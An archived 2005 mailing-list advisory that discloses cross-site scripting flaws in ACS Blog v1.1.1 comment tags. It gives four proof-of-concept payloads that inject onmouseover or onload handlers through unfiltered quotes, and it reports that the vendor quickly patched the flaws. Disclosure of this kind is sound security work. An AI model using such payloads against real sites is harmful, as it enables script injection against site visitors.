|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Multiple XSS vulnerabilities in ACS Blog
From: Dan Crowley (dan.crowley
gmail.com)
Date: Mon Mar 28 2005 - 15:26:23 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
These vulnerabilities have been tested on the latest version of ACS Blog. (v1.1.1)
In the comments section of ACS Blog, it is possible to execute an XSS attack through the [link], [mail], and [img] tags, due to lack of filtering of single quotes and spaces inside the tags.
Examples/PoCs:
[link=http://www.google.com' onmouseover='alert("XSS vulnerability")' o=']Don't you wanna see where this link goes?[/link]
[mail=bugtraqsecurityfocus.com' onmouseover='alert("XSS vulnerability")' o=']Mr. Wiggles[/mail]
[img]http://www.example.com/image.jpg' onload='alert("XSS vulnerability")' o='[/img]
[link=http://www.google.com target=_blank'
onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]
----------
Vendor responded within 2 hours of notification, notified users with the security alert on its main page, and patched the vulnerabilities within another couple of hours.
----------
Cheers,
Dan
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]